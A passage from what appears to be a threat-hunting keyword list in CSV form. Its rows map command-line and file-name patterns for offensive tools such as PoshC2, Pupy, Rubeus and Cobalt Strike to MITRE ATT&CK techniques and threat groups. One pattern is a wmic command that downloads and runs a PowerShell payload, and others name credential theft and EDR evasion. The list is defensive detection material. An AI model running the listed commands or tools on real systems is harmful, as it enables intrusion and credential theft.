T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* PoshC2 *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* -PoshC2Dir *,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 
- T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* -PoshC2Dir *,offensive_tool_keyword,poshc2,PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and lateral movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. *nix and OSX.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -* pptp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* preauthscan /users:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* prepare.sh shell/mod_*.htaccess*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,0,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -* --preset all -o syscalls_all*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,0,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -* --preset common -o syscalls_common*,offensive_tool_keyword,SysWhispers3,SysWhispers on Steroids - AV/EDR evasion via direct system calls.,T1548 T1562 T1027 ,N/A,N/A,N/A,Defense Evasion,https://github.com/klezVirus/SysWhispers3,1,0,N/A,N/A,10,1006,148,2023-03-22T19:23:21Z,2022-03-07T18:56:21Z -* PrincipalsAllowedToDelegateToAccount *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* Priv_Esc.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -* --priv-esc*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,0,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -* process call create *cmd.exe /c powershell.exe -nop -w hidden -c *IEX ((new-object net.webclient).downloadstring('https://*,greyware_tool_keyword,wmic,Threat Actors ran the following command to download and execute a PowerShell payload,T1059.001 - T1059.003 - T1569.002 - T1021.006,TA0002 - TA0005,N/A,N/A,Collection,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Process spawned with stolen token!*,offensive_tool_keyword,Gotato,Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.,T1003.003 - T1056.002 - T1550.001 - T1090,TA0005 - TA0004 - TA0009,N/A,N/A,Privilege Escalation,https://github.com/iammaguire/Gotato,1,0,N/A,9,2,114,16,2021-06-07T21:19:58Z,2021-06-05T22:32:48Z -* --propagated*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* proxychains *,offensive_tool_keyword,proxychains,proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy,T1090.004 - T1090.003 - T1027,TA0001 - TA0006 - TA0040,N/A,N/A,Exploitation tools,https://github.com/haad/proxychains,1,0,N/A,N/A,10,5489,586,2023-04-05T10:32:16Z,2011-02-25T12:27:05Z -* ps /target:*.xml /unprotect*,offensive_tool_keyword,SharpDPAPI,SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.,T1552.002 - T1059.001 - T1112,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/GhostPack/SharpDPAPI,1,0,N/A,10,10,959,187,2023-08-28T19:03:12Z,2018-08-22T17:39:31Z -* ptt /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* ptunnel-ng*,offensive_tool_keyword,ptunnel-ng,Tunnel TCP connections through ICMP.,T1095.001 - T1043 - T1572.001,TA0011 - TA0040 - TA0003,N/A,N/A,Data Exfiltration,https://github.com/utoni/ptunnel-ng,1,0,N/A,N/A,3,285,60,2023-05-17T12:47:52Z,2017-12-19T18:10:35Z -* --publickey * --ecmdigits 25 --verbose --private*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* --publickey * --uncipherfile ./ciphered\_file*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* puppet-naivesigning.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* PupyCredentials*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* pupylib.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupySocketStream*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupyTCPClient*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupyTCPServer*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupyWebServer*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupyWebSocketClient*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* PupyWebSocketServer*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* pupyx64.lin*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* push_payload*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* putterpanda.py*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -* Pwn3d!*,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* 
py2exe*,greyware_tool_keyword,py2exe,py2exe allows you to convert Python scripts into standalone executable files for Windows othen used by attacker,T1564.004 - T1027.001 - T1059.006,TA0002 - TA0003 - TA0005,Operation Wocao,N/A,Execution,https://github.com/py2exe/py2exe,1,0,greyware_tools high risks of false positives,N/A,7,646,83,2023-09-25T23:45:56Z,2019-03-11T13:16:35Z -* pyasn1 *,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -* pyasn1.*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/connormcgarr/tgtdelegation,1,0,N/A,10,10,128,21,2021-11-26T16:45:05Z,2021-11-22T18:42:57Z -* pyLAPS.py*,offensive_tool_keyword,pyLAPS,A simple way to read and write LAPS passwords from linux.,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/p0dalirius/pyLAPS,1,0,N/A,9,1,50,9,2023-10-01T19:17:01Z,2021-10-05T18:35:21Z -* pypykatz*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,0,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -* pywsus.py *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -q -r karma.rc_.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://www.metasploit.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* qconn-exec.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* qscan.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* quake1-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* quake3-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* quake3-master-getservers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -r data/* -p * -m readfiles*portscan*,offensive_tool_keyword,SSRFmap,Automatic SSRF fuzzer and exploitation tool,T1210 - T1211 - T1212 - T1574,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/swisskyrepo/SSRFmap,1,0,N/A,N/A,10,2463,459,2023-05-27T19:30:08Z,2018-10-15T19:08:26Z -* radare *:* -ble*,offensive_tool_keyword,RadareEye,Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Network Exploitation tools,https://github.com/souravbaghz/RadareEye,1,0,N/A,N/A,4,338,50,2021-12-11T06:16:37Z,2021-01-07T04:52:58Z -* rai-attack-dns*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,0,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -* rai-attack-http*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - 